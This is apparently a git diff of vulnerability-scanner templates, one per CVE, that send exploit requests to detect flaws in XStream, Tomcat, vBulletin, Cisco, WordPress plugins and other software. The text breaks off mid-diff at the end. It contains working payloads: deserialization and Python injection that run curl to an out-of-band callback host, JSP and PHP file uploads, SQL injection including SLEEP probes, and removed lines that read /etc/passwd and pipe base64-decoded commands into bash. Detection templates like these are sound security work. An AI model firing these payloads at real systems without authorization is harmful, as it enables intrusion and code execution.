a/http/cves/2013/CVE-2013-7285.yaml b/http/cves/2013/CVE-2013-7285.yaml index 85bdae513f..cd151efaa9 100644 --- a/http/cves/2013/CVE-2013-7285.yaml +++ b/http/cves/2013/CVE-2013-7285.yaml @@ -2,16 +2,16 @@ id: CVE-2013-7285 info: name: XStream <1.4.6/1.4.10 - Remote Code Execution - author: pwnhxl + author: pwnhxl,vicrack severity: critical description: | Xstream API before 1.4.6 and 1.4.10 is susceptible to remote code execution. If the security framework has not been initialized, an attacker can run arbitrary shell commands by manipulating the processed input stream when unmarshaling XML or any supported format. This can allow an attacker to obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. reference: - - http://x-stream.github.io/CVE-2013-7285.html - https://x-stream.github.io/CVE-2013-7285.html - https://www.mail-archive.com/user@xstream.codehaus.org/msg00607.html - https://www.mail-archive.com/user@xstream.codehaus.org/msg00604.html - https://nvd.nist.gov/vuln/detail/cve-2013-7285 + - https://blog.csdn.net/Xxy605/article/details/126297121 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -30,17 +30,21 @@ http: Host: {{Hostname}} Content-Type: application/xml - - org.company.model.Contact - - - - curl http://{{interactsh-url}} -H 'User-Agent: {{rand_base(6)}}' - - - start - - + + foo + + java.lang.Comparable + + + + curl + http://{{interactsh-url}} + + + start + + + matchers-condition: and matchers: @@ -52,6 +56,5 @@ http: - type: word part: interactsh_request words: - - "User-Agent: {{rand_base(6)}}" - + - "User-Agent: curl" # Enhanced by md on 2023/04/12 diff --git a/http/cves/2015/CVE-2015-1880.yaml b/http/cves/2015/CVE-2015-1880.yaml index cf6b417de1..fe1b6beb96 100644 --- a/http/cves/2015/CVE-2015-1880.yaml +++ b/http/cves/2015/CVE-2015-1880.yaml @@ -15,7 +15,7 @@ info: cvss-score: 4.3 cve-id: CVE-2015-1880 cwe-id: CWE-79 - tags: cve,cve2015,xss,fortigates,ssl + tags: cve,cve2015,xss,fortigates metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-3088.yaml b/http/cves/2016/CVE-2016-3088.yaml index 9eb0581970..70a549181f 100644 --- a/http/cves/2016/CVE-2016-3088.yaml +++ b/http/cves/2016/CVE-2016-3088.yaml @@ -19,16 +19,19 @@ info: metadata: max-request: 2 +variables: + rand1: '{{rand_int(11111111, 99999999)}}' + http: - raw: - | - PUT /fileserver/test.txt HTTP/1.1 + PUT /fileserver/{{randstr}}.txt HTTP/1.1 Host: {{Hostname}} - {{randstr}} + {{rand1}} - | - GET /fileserver/test.txt HTTP/1.1 + GET /fileserver/{{randstr}}.txt HTTP/1.1 Host: {{Hostname}} req-condition: true @@ -37,7 +40,5 @@ http: dsl: - "status_code_1==204" - "status_code_2==200" - - "contains((body_2), '{{randstr}}')" + - "contains((body_2), '{{rand1}}')" condition: and - -# Enhanced by mp on 2022/04/22 diff --git a/http/cves/2016/CVE-2016-6195.yaml b/http/cves/2016/CVE-2016-6195.yaml new file mode 100644 index 0000000000..59edb97f43 --- /dev/null +++ b/http/cves/2016/CVE-2016-6195.yaml @@ -0,0 +1,47 @@ +id: CVE-2016-6195 + +info: + name: vBulletin <= 4.2.3 - SQL Injection + author: MaStErChO + severity: high + description: | + vBulletin versions 3.6.0 through 4.2.3 are vulnerable to an SQL injection vulnerability in the vBulletin core forumrunner addon. The vulnerability allows an attacker to execute arbitrary SQL queries and potentially access sensitive information from the database. + reference: + - https://www.cvedetails.com/cve/CVE-2016-6195/ + - https://www.exploit-db.com/exploits/38489 + - https://www.securityfocus.com/bid/94312 + - https://enumerated.wordpress.com/2016/07/11/1/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2016-6195 + cwe-id: CWE-89 + metadata: + max-request: 6 + shodan-query: title:"Powered By vBulletin" + verified: "true" + tags: cve,cve2016,vbulletin,sqli,forum,edb + +http: + - method: GET + path: + - "{{BaseURL}}/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27" + - "{{BaseURL}}/boards/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27" + - "{{BaseURL}}/board/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27" + - "{{BaseURL}}/forum/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27" + - "{{BaseURL}}/forums/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27" + - "{{BaseURL}}/vb/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "type=dberror" + + - type: status + status: + - 200 + - 503 + condition: or diff --git a/http/cves/2017/CVE-2017-12617.yaml b/http/cves/2017/CVE-2017-12617.yaml new file mode 100644 index 0000000000..62e33bc1bf --- /dev/null +++ b/http/cves/2017/CVE-2017-12617.yaml @@ -0,0 +1,44 @@ +id: CVE-2017-12617 + +info: + name: Apache Tomcat - Remote Code Execution + author: pussycat0x + severity: high + description: | + When running Apache Tomcat versions 9.0.0.M1 to 9.0.0, 8.5.0 to 8.5.22, 8.0.0.RC1 to 8.0.46 and 7.0.0 to 7.0.81 with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default servlet to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server. + reference: + - https://versa-networks.com/blog/apache-tomcat-remote-code-execution-vulnerability-cve-2017-12617/ + - https://github.com/cyberheartmi9/CVE-2017-12617 + - https://www.exploit-db.com/exploits/43008 + - https://nvd.nist.gov/vuln/detail/CVE-2017-12617 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.3 + cwe-id: CWE-434 + metadata: + verified: "true" + max-request: 2 + shodan-query: html:"Apache Tomcat" + tags: cve,cve2017,tomcat,apache,rce,kev,intrusive + +http: + - raw: + - | + PUT /{{randstr}}.jsp/ HTTP/1.1 + Host: {{Hostname}} + + <% out.println("CVE-2017-12617");%> + - | + GET /{{randstr}}.jsp HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body_2 + words: + - "CVE-2017-12617" + + - type: status + status: + - 200 diff --git a/http/cves/2018/CVE-2018-18069.yaml b/http/cves/2018/CVE-2018-18069.yaml index 92339f7d56..b8171c5dff 100644 --- a/http/cves/2018/CVE-2018-18069.yaml +++ b/http/cves/2018/CVE-2018-18069.yaml @@ -31,7 +31,7 @@ http: matchers: - type: dsl dsl: - - 'contains(tolower(all_headers), "text/html")' + - 'contains(tolower(header), "text/html")' - 'contains(set_cookie, "_icl_current_admin_language")' - 'contains(body, "\">")' condition: and diff --git a/http/cves/2018/CVE-2018-19749.yaml b/http/cves/2018/CVE-2018-19749.yaml index 98ff191189..33bf3da058 100644 --- a/http/cves/2018/CVE-2018-19749.yaml +++ b/http/cves/2018/CVE-2018-19749.yaml @@ -48,7 +48,7 @@ http: - type: dsl dsl: - 'status_code_3 == 200' - - 'contains(all_headers_3, "text/html")' + - 'contains(header_3, "text/html")' - "contains(body_3, '>')" condition: and diff --git a/http/cves/2018/CVE-2018-19914.yaml b/http/cves/2018/CVE-2018-19914.yaml index 2a19d1b12b..d14433598d 100644 --- a/http/cves/2018/CVE-2018-19914.yaml +++ b/http/cves/2018/CVE-2018-19914.yaml @@ -48,7 +48,7 @@ http: - type: dsl dsl: - 'status_code_3 == 200' - - 'contains(all_headers_3, "text/html")' + - 'contains(header_3, "text/html")' - 'contains(body_3, ">")' condition: and diff --git a/http/cves/2018/CVE-2018-19915.yaml b/http/cves/2018/CVE-2018-19915.yaml index be6b9f85e7..a7c160e72c 100644 --- a/http/cves/2018/CVE-2018-19915.yaml +++ b/http/cves/2018/CVE-2018-19915.yaml @@ -48,7 +48,7 @@ http: - type: dsl dsl: - 'status_code_3 == 200' - - 'contains(all_headers_3, "text/html")' + - 'contains(header_3, "text/html")' - 'contains(body_3, ">")' condition: and diff --git a/http/cves/2018/CVE-2018-20009.yaml b/http/cves/2018/CVE-2018-20009.yaml index f4e31e6891..12f08aa00e 100644 --- a/http/cves/2018/CVE-2018-20009.yaml +++ b/http/cves/2018/CVE-2018-20009.yaml @@ -48,7 +48,7 @@ http: - type: dsl dsl: - 'status_code_3 == 200' - - 'contains(all_headers_3, "text/html")' + - 'contains(header_3, "text/html")' - 'contains(body_3, ">")' condition: and diff --git a/http/cves/2018/CVE-2018-20010.yaml b/http/cves/2018/CVE-2018-20010.yaml index 3a69e5b929..e0a3153ea8 100644 --- a/http/cves/2018/CVE-2018-20010.yaml +++ b/http/cves/2018/CVE-2018-20010.yaml @@ -48,7 +48,7 @@ http: - type: dsl dsl: - 'status_code_3 == 200' - - 'contains(all_headers_3, "text/html")' + - 'contains(header_3, "text/html")' - 'contains(body_3, ">")' condition: and diff --git a/http/cves/2018/CVE-2018-20011.yaml b/http/cves/2018/CVE-2018-20011.yaml index d3934bddb4..82c7ca84d7 100644 --- a/http/cves/2018/CVE-2018-20011.yaml +++ b/http/cves/2018/CVE-2018-20011.yaml @@ -48,7 +48,7 @@ http: - type: dsl dsl: - 'status_code_3 == 200' - - 'contains(all_headers_3, "text/html")' + - 'contains(header_3, "text/html")' - 'contains(body_3, ">")' condition: and diff --git a/http/cves/2018/CVE-2018-20526.yaml b/http/cves/2018/CVE-2018-20526.yaml index 74f3f80398..c5a2cc60ab 100644 --- a/http/cves/2018/CVE-2018-20526.yaml +++ b/http/cves/2018/CVE-2018-20526.yaml @@ -51,13 +51,13 @@ http: Content-Type: application/octet-stream ------WebKitFormBoundary20kgW2hEKYaeF5iP-- - | - GET /Uploads/{{randstr}}.php7?cmd=echo+"roxyfileman"+|+rev HTTP/1.1 + GET /Uploads/{{randstr}}.php7 HTTP/1.1 Host: {{Hostname}} cookie-reuse: true @@ -68,15 +68,8 @@ http: - type: word part: body words: - - "namelifyxor" - - - type: word - part: header - words: - - text/html + - "f76d6a5f7491700cc3a678bdba2902d3" - type: status status: - 200 - -# Enhanced by mp on 2022/10/07 diff --git a/http/cves/2019/CVE-2019-10098.yaml b/http/cves/2019/CVE-2019-10098.yaml new file mode 100644 index 0000000000..518402e033 --- /dev/null +++ b/http/cves/2019/CVE-2019-10098.yaml @@ -0,0 +1,35 @@ +id: CVE-2019-10098 + +info: + name: Apache HTTP server v2.4.0 to v2.4.39 - Open Redirect + author: ctflearner + severity: medium + description: | + In Apache HTTP server 2.4.0 to 2.4.39, Redirects configured with mod_rewrite that were intended to be self-referential might be fooled by encoded newlines and redirect instead to an unexpected URL within the request URL. + reference: + - https://www.exploit-db.com/exploits/47689 + - https://nvd.nist.gov/vuln/detail/CVE-2019-10098 + - https://www.openwall.com/lists/oss-security/2020/04/01/4 + - https://httpd.apache.org/security/vulnerabilities_24.html + - https://www.oracle.com/security-alerts/cpuapr2021.html + - https://www.oracle.com/security-alerts/cpuoct2019.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2019-10098 + cwe-id: CWE-601 + cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + tags: cve,cve2019,redirect,apache,server + +http: + - method: GET + path: + - "{{BaseURL}}/http%3A%2F%2Fwww.interact.sh" + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' diff --git a/http/cves/2019/CVE-2019-11869.yaml b/http/cves/2019/CVE-2019-11869.yaml index d77c2fd7d0..805faa34f8 100644 --- a/http/cves/2019/CVE-2019-11869.yaml +++ b/http/cves/2019/CVE-2019-11869.yaml @@ -48,6 +48,6 @@ http: - type: dsl dsl: - - "contains(tolower(all_headers_2), 'text/html')" + - "contains(tolower(header_2), 'text/html')" # Enhanced by mp on 2022/08/11 diff --git a/http/cves/2019/CVE-2019-12990.yaml b/http/cves/2019/CVE-2019-12990.yaml index 1131b7db05..82609f3a2d 100644 --- a/http/cves/2019/CVE-2019-12990.yaml +++ b/http/cves/2019/CVE-2019-12990.yaml @@ -41,7 +41,7 @@ http: matchers: - type: dsl dsl: - - 'contains(all_headers, "text/html")' + - 'contains(header, "text/html")' - 'status_code_3 == 200' - 'contains(body_1, "Citrix SD-WAN")' condition: and diff --git a/http/cves/2019/CVE-2019-15811.yaml b/http/cves/2019/CVE-2019-15811.yaml index aca348417c..7700c3611e 100644 --- a/http/cves/2019/CVE-2019-15811.yaml +++ b/http/cves/2019/CVE-2019-15811.yaml @@ -42,7 +42,7 @@ http: - type: dsl dsl: - 'status_code_2 == 200' - - 'contains(all_headers_2, "text/html")' + - 'contains(header_2, "text/html")' - 'contains(body_2, "value=\"\"onfocus=\"alert(document.domain)\"autofocus=")' - 'contains(body_2, "DomainMOD")' condition: and diff --git a/http/cves/2019/CVE-2019-18394.yaml b/http/cves/2019/CVE-2019-18394.yaml index b484b148f7..e8165c845c 100644 --- a/http/cves/2019/CVE-2019-18394.yaml +++ b/http/cves/2019/CVE-2019-18394.yaml @@ -23,12 +23,11 @@ info: http: - method: GET path: - - "{{BaseURL}}/getFavicon?host=http://{{interactsh-url}}" + - "{{BaseURL}}/getFavicon?host=http://oast.fun/" matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" - -# Enhanced by mp on 2022/05/03 + - type: dsl + dsl: + - "contains(body, 'Interactsh Server')" + - status_code == 200 + condition: and diff --git a/http/cves/2019/CVE-2019-1943.yaml b/http/cves/2019/CVE-2019-1943.yaml new file mode 100644 index 0000000000..29572306af --- /dev/null +++ b/http/cves/2019/CVE-2019-1943.yaml @@ -0,0 +1,45 @@ +id: CVE-2019-1943 + +info: + name: Cisco Small Business 200,300 and 500 Series Switches - Open Redirect + author: bhutch + severity: medium + description: | + Cisco Small Business 200,300 and 500 Series Switches contain an open redirect vulnerability in the Web UI. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + reference: + - https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190717-sbss-redirect + - https://www.exploit-db.com/exploits/47118 + - https://nvd.nist.gov/vuln/detail/CVE-2019-1943 + classification: + cve-id: CVE-2019-1943 + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.7 + cwe-id: CWE-601 + metadata: + max-request: 1 + verified: "true" + shodan-query: "/config/log_off_page.htm" + censys-query: "services.http.response.headers.location: /config/log_off_page.htm" + tags: cve,cve2023,redirect,cisco + +http: + - raw: + - | + GET / HTTP/1.1 + Host: interact.sh + + matchers-condition: and + matchers: + - type: regex + part: header + regex: + - '(?i)Location:\shttps?:\/\/interact\.sh/cs[\w]+/' + + - type: word + part: server + words: + - 'GoAhead-Webs' + + - type: status + status: + - 302 diff --git a/http/cves/2019/CVE-2019-20183.yaml b/http/cves/2019/CVE-2019-20183.yaml index 205601d644..3752b00bcb 100644 --- a/http/cves/2019/CVE-2019-20183.yaml +++ b/http/cves/2019/CVE-2019-20183.yaml @@ -2,7 +2,7 @@ id: CVE-2019-20183 info: name: Simple Employee Records System 1.0 - Unrestricted File Upload - author: pikpikcu + author: pikpikcu,j4vaovo severity: high description: | Simple Employee Records System 1.0 contains an arbitrary file upload vulnerability due to client-side validation of file extensions. This can be used to upload executable code to the server to obtain access or perform remote command execution. @@ -17,7 +17,7 @@ info: cwe-id: CWE-434 cpe: cpe:2.3:a:employee_records_system_project:employee_records_system:*:*:*:*:*:*:*:* epss-score: 0.02791 - tags: edb,cve,cve2019,rce,intrusive,fileupload + tags: edb,cve,cve2019,rce,fileupload,intrusive metadata: max-request: 2 @@ -35,13 +35,13 @@ http: Content-Type: image/png -----------------------------5825462663702204104870787337-- - | - GET /uploads/employees_ids/{{endpoint}}?cmd=cat%20/etc/passwd HTTP/1.1 + GET /uploads/employees_ids/{{endpoint}} HTTP/1.1 Host: {{Hostname}} extractors: @@ -53,10 +53,7 @@ http: - '(?:[a-zA-Z0-9+\/])*_poc.php' matchers: - - type: regex - part: body - regex: - - "root:.*:0:0:" - condition: and - -# Enhanced by mp on 2022/06/17 + - type: word + part: body_2 + words: + - "1ad0d710225c472cb7396b3c1d97e4dd" diff --git a/http/cves/2019/CVE-2019-3403.yaml b/http/cves/2019/CVE-2019-3403.yaml index 231cf4ee20..e7800cf2e5 100644 --- a/http/cves/2019/CVE-2019-3403.yaml +++ b/http/cves/2019/CVE-2019-3403.yaml @@ -39,8 +39,12 @@ http: words: - 'application/json' + - type: word + part: body + words: + - "Showing 0 of 0 matching users" + negative: true + - type: status status: - 200 - -# Enhanced by md on 2023/04/03 diff --git a/http/cves/2020/CVE-2020-11547.yaml b/http/cves/2020/CVE-2020-11547.yaml index ee8eed1e84..8a4f07ba55 100644 --- a/http/cves/2020/CVE-2020-11547.yaml +++ b/http/cves/2020/CVE-2020-11547.yaml @@ -20,7 +20,7 @@ info: max-request: 3 verified: true shodan-query: title:"prtg" - tags: cve,cve2020,prtg,disclosure,network + tags: cve,cve2020,prtg,disclosure http: - method: GET diff --git a/http/cves/2020/CVE-2020-11978.yaml b/http/cves/2020/CVE-2020-11978.yaml index 3731c247d6..253033e683 100644 --- a/http/cves/2020/CVE-2020-11978.yaml +++ b/http/cves/2020/CVE-2020-11978.yaml @@ -64,7 +64,7 @@ http: - type: dsl dsl: - 'contains(body_4, "operator":"BashOperator")' - - 'contains(all_headers_4, "application/json")' + - 'contains(header_4, "application/json")' condition: and # Enhanced by mp on 2022/07/13 diff --git a/http/cves/2020/CVE-2020-13405.yaml b/http/cves/2020/CVE-2020-13405.yaml index 8f940179da..e2ff6083ec 100644 --- a/http/cves/2020/CVE-2020-13405.yaml +++ b/http/cves/2020/CVE-2020-13405.yaml @@ -46,7 +46,7 @@ http: - 'contains(body,"password")' - 'contains(body,"password_reset_hash")' - 'status_code==200' - - 'contains(all_headers,"text/html")' + - 'contains(header,"text/html")' condition: and # Enhanced by md on 2023/04/04 diff --git a/http/cves/2020/CVE-2020-14750.yaml b/http/cves/2020/CVE-2020-14750.yaml index 6a9c22a194..1b36865194 100644 --- a/http/cves/2020/CVE-2020-14750.yaml +++ b/http/cves/2020/CVE-2020-14750.yaml @@ -29,7 +29,6 @@ http: @timeout: 10s POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1 Host: {{Hostname}} - User-Agent: curl/7.79.1 Accept: */* cmd: curl {{interactsh-url}} Content-Type: application/x-www-form-urlencoded diff --git a/http/cves/2020/CVE-2020-20988.yaml b/http/cves/2020/CVE-2020-20988.yaml index b7d2287b24..0c73c5fccd 100644 --- a/http/cves/2020/CVE-2020-20988.yaml +++ b/http/cves/2020/CVE-2020-20988.yaml @@ -44,7 +44,7 @@ http: - type: dsl dsl: - 'status_code_2 == 200' - - 'contains(all_headers_2, "text/html")' + - 'contains(header_2, "text/html")' - 'contains(body_2, "value=\"\"/>")' - 'contains(body_2, "DomainMOD")' condition: and diff --git a/http/cves/2020/CVE-2020-23697.yaml b/http/cves/2020/CVE-2020-23697.yaml index 5283ef23e2..0aac2a5075 100644 --- a/http/cves/2020/CVE-2020-23697.yaml +++ b/http/cves/2020/CVE-2020-23697.yaml @@ -53,7 +53,7 @@ http: matchers: - type: dsl dsl: - - 'contains(all_headers_4, "text/html")' + - 'contains(header_4, "text/html")' - 'status_code_4 == 200' - 'contains(body_4, ">") && contains(body_4, "Monstra")' condition: and diff --git a/http/cves/2020/CVE-2020-26217.yaml b/http/cves/2020/CVE-2020-26217.yaml index 624360eb63..7b4b09fe92 100644 --- a/http/cves/2020/CVE-2020-26217.yaml +++ b/http/cves/2020/CVE-2020-26217.yaml @@ -2,7 +2,7 @@ id: CVE-2020-26217 info: name: XStream <1.4.14 - Remote Code Execution - author: pwnhxl + author: pwnhxl,vicrack severity: high description: | XStream before 1.4.14 is susceptible to remote code execution. An attacker can run arbitrary shell commands by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. Users who rely on blocklists are affected. @@ -47,7 +47,8 @@ http: - curl http://{{interactsh-url}} -H 'User-Agent: {{rand_base(6)}}' + curl + http://{{interactsh-url}} @@ -92,6 +93,5 @@ http: - type: word part: interactsh_request words: - - "User-Agent: {{rand_base(6)}}" - + - "User-Agent: curl" # Enhanced by md on 2023/04/12 diff --git a/http/cves/2020/CVE-2020-28871.yaml b/http/cves/2020/CVE-2020-28871.yaml index 1ae834a1da..212620f47f 100644 --- a/http/cves/2020/CVE-2020-28871.yaml +++ b/http/cves/2020/CVE-2020-28871.yaml @@ -19,10 +19,7 @@ info: epss-score: 0.96822 metadata: max-request: 2 - tags: unauth,cve,fileupload,monitorr,oast,edb,intrusive,packetstorm,cve2020,rce - -variables: - useragent: '{{rand_base(6)}}' + tags: unauth,cve,fileupload,monitorr,edb,intrusive,packetstorm,cve2020,rce http: - raw: @@ -42,7 +39,7 @@ http: Content-Disposition: form-data; name="fileToUpload"; filename="{{randstr}}.php" Content-Type: image/gif - GIF89a213213123 -----------------------------31046105003900160576454225745-- @@ -53,13 +50,10 @@ http: matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: body_2 words: - - "http" + - "d03c180355b797069cc047ff5606d689" - - type: word - part: interactsh_request - words: - - "User-Agent: {{useragent}}" - -# Enhanced by mp on 2022/03/27 + - type: status + status: + - 200 diff --git a/http/cves/2020/CVE-2020-35847.yaml b/http/cves/2020/CVE-2020-35847.yaml index cef561011a..802b2a9832 100644 --- a/http/cves/2020/CVE-2020-35847.yaml +++ b/http/cves/2020/CVE-2020-35847.yaml @@ -19,32 +19,50 @@ info: cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:* epss-score: 0.80883 metadata: - max-request: 1 - verified: true + max-request: 2 shodan-query: http.favicon.hash:688609340 + verified: true tags: cve,cve2020,nosqli,sqli,cockpit,injection - http: - - method: POST - path: - - "{{BaseURL}}/auth/requestreset" - headers: - Content-Type: application/json - body: | - { - "user": { - "$func": "var_dump" + - raw: + - | + POST /auth/requestreset HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { + "user": { + "$func": "var_dump" + } + } + + - | + POST /auth/requestreset HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { + "user": { + "$func": "nonexistent_function" + } } - } matchers-condition: and matchers: - type: regex + part: body_1 regex: - 'string\([0-9]{1,3}\)(\s)?"([A-Za-z0-9-.@\s-]+)"' - type: regex + part: body_1 regex: - 'string\([0-9]{1,3}\)(\s)?"(error404)([A-Za-z0-9-.@\s-]+)"' negative: true + + - type: regex + part: body_2 + regex: + - 'string\([0-9]{1,3}\)(\s)?"([A-Za-z0-9-.@\s-]+)"' + negative: true diff --git a/http/cves/2020/CVE-2020-9043.yaml b/http/cves/2020/CVE-2020-9043.yaml index 16363ff4b0..768856c75b 100644 --- a/http/cves/2020/CVE-2020-9043.yaml +++ b/http/cves/2020/CVE-2020-9043.yaml @@ -52,7 +52,7 @@ http: matchers: - type: dsl dsl: - - "contains(all_headers_4, 'text/html')" + - "contains(header_4, 'text/html')" - "status_code_4 == 200" - "contains(body_4, 'wpCentral Connection Key')" - contains(body_4, "pagenow = \'dashboard\'") diff --git a/http/cves/2021/CVE-2021-1497.yaml b/http/cves/2021/CVE-2021-1497.yaml index 31852d89ca..5e6581e7b1 100644 --- a/http/cves/2021/CVE-2021-1497.yaml +++ b/http/cves/2021/CVE-2021-1497.yaml @@ -19,12 +19,14 @@ info: cve-id: CVE-2021-1497 cwe-id: CWE-78 epss-score: 0.9751 - tags: cisco,rce,oast,kev,packetstorm,cve,cve2021 + tags: cve,cve2021,cisco,rce,oast,kev,packetstorm, metadata: max-request: 2 variables: useragent: '{{rand_base(6)}}' + cmd: 'curl http://{{interactsh-url}} -H \"User-Agent: {{useragent}}\"' + payload: '123",""$6$$)); import os;os.system("{{cmd}}");print(crypt.crypt("' http: - raw: @@ -34,7 +36,7 @@ http: Accept: */* Content-Type: application/x-www-form-urlencoded - username=root&password={{url_encode('123\",\"$6$$\"));import os;os.system(\"curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'\");print(crypt.crypt(\"')}} + username=root&password={{url_encode(payload)}} - | POST /auth HTTP/1.1 @@ -42,7 +44,7 @@ http: Accept: */* Content-Type: application/x-www-form-urlencoded - username=root&password={{url_encode('123\",\"$6$$\"));import os;os.system(\"curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'\");print(crypt.crypt(\"')}} + username=root&password={{url_encode(payload)}} matchers-condition: and matchers: diff --git a/http/cves/2021/CVE-2021-21345.yaml b/http/cves/2021/CVE-2021-21345.yaml index ffa7c37190..b21c3a55cb 100644 --- a/http/cves/2021/CVE-2021-21345.yaml +++ b/http/cves/2021/CVE-2021-21345.yaml @@ -2,7 +2,7 @@ id: CVE-2021-21345 info: name: XStream <1.4.16 - Remote Code Execution - author: pwnhxl + author: pwnhxl,vicrack severity: critical description: | XStream before 1.4.16 is susceptible to remote code execution. An attacker who has sufficient rights can execute host commands via manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations. @@ -22,9 +22,6 @@ info: metadata: max-request: 1 -variables: - rand: "{{rand_base(6)}}" - http: - raw: - | @@ -76,7 +73,7 @@ http: - /bin/bash -c {echo,{{base64("curl http://{{interactsh-url}} -H \'User-Agent: {{rand}}\'")}}}|{base64,-d}|{bash,-i} + curl http://{{interactsh-url}} @@ -102,4 +99,4 @@ http: - type: word part: interactsh_request words: - - "User-Agent: {{rand}}" + - "User-Agent: curl" diff --git a/http/cves/2021/CVE-2021-24145.yaml b/http/cves/2021/CVE-2021-24145.yaml index 7d36abe7f4..9add23447c 100644 --- a/http/cves/2021/CVE-2021-24145.yaml +++ b/http/cves/2021/CVE-2021-24145.yaml @@ -61,7 +61,7 @@ http: matchers: - type: dsl dsl: - - contains(all_headers_3, "text/html") + - contains(header_3, "text/html") - status_code_3 == 200 - contains(body_3, 'CVE-2021-24145') condition: and diff --git a/http/cves/2021/CVE-2021-24155.yaml b/http/cves/2021/CVE-2021-24155.yaml index ed17c57857..e7f3797347 100644 --- a/http/cves/2021/CVE-2021-24155.yaml +++ b/http/cves/2021/CVE-2021-24155.yaml @@ -66,7 +66,7 @@ http: matchers: - type: dsl dsl: - - contains(all_headers_4, "text/html") + - contains(header_4, "text/html") - status_code_4 == 200 - contains(body_3, '{\"success\":1}') - contains(body_4, 'CVE-2021-24155') diff --git a/http/cves/2021/CVE-2021-24165.yaml b/http/cves/2021/CVE-2021-24165.yaml index 8eb9d83336..b272d3bf99 100644 --- a/http/cves/2021/CVE-2021-24165.yaml +++ b/http/cves/2021/CVE-2021-24165.yaml @@ -43,7 +43,7 @@ http: dsl: - 'status_code_1 == 302' - 'status_code_2 == 302' - - "contains(all_headers_2, 'Location: https://interact.sh?client_id=1')" + - "contains(header_2, 'Location: https://interact.sh?client_id=1')" condition: and # Enhanced by md on 2022/10/14 diff --git a/http/cves/2021/CVE-2021-24340.yaml b/http/cves/2021/CVE-2021-24340.yaml index 533762ac2f..ad7d0ca2ae 100644 --- a/http/cves/2021/CVE-2021-24340.yaml +++ b/http/cves/2021/CVE-2021-24340.yaml @@ -2,7 +2,7 @@ id: CVE-2021-24340 info: name: WordPress Statistics <13.0.8 - Blind SQL Injection - author: lotusdll + author: lotusdll,j4vaovo severity: high description: WordPress Statistic plugin versions prior to version 13.0.8 are affected by an unauthenticated time-based blind SQL injection vulnerability. reference: @@ -18,41 +18,32 @@ info: cwe-id: CWE-89 cpe: cpe:2.3:a:veronalabs:wp_statistics:*:*:*:*:*:*:*:* epss-score: 0.03512 - tags: cve,wp-plugin,unauth,wpscan,cve2021,wordpress,sqli,blind,edb metadata: - max-request: 1 + max-request: 2 + tags: cve,wp-plugin,unauth,wpscan,cve2021,wordpress,sqli,blind,edb http: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/wp-statistics/readme.txt' + - raw: + - | + GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1 + Host: {{Hostname}} - extractors: - - type: regex - name: version - internal: true - group: 1 - regex: - - "(?m)Stable tag: ([0-9.]+)" - - - type: regex - group: 1 - regex: - - "(?m)Stable tag: ([0-9.]+)" + - | + @timeout: 15s + GET /wp-admin/admin.php?page=wps_pages_page&ID=0+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))test)&type=home HTTP/1.1 + Host: {{Hostname}} matchers-condition: and matchers: - - type: status - status: - - 200 - - - type: word - words: - - "WP Statistics" - part: body + - type: dsl + dsl: + - 'status_code_1 == 200' + - 'contains(body_1, "WP Statistics")' + condition: and - type: dsl dsl: - - compare_versions(version, '< 13.0.8') - -# Enhanced by mp on 2022/06/22 + - 'duration_2>=7' + - 'status_code_2 == 500' + - 'contains(body_2, ">WordPress › Error<") && contains(body_2, ">Your request is not valid.<")' + condition: and diff --git a/http/cves/2021/CVE-2021-24347.yaml b/http/cves/2021/CVE-2021-24347.yaml index fdbafd1e04..58076c00f8 100644 --- a/http/cves/2021/CVE-2021-24347.yaml +++ b/http/cves/2021/CVE-2021-24347.yaml @@ -88,7 +88,7 @@ http: matchers: - type: dsl dsl: - - contains(all_headers_4, "text/html") + - contains(header_4, "text/html") - status_code_4 == 200 - contains(body_4, "CVE-2021-24347") condition: and diff --git a/http/cves/2021/CVE-2021-24436.yaml b/http/cves/2021/CVE-2021-24436.yaml index 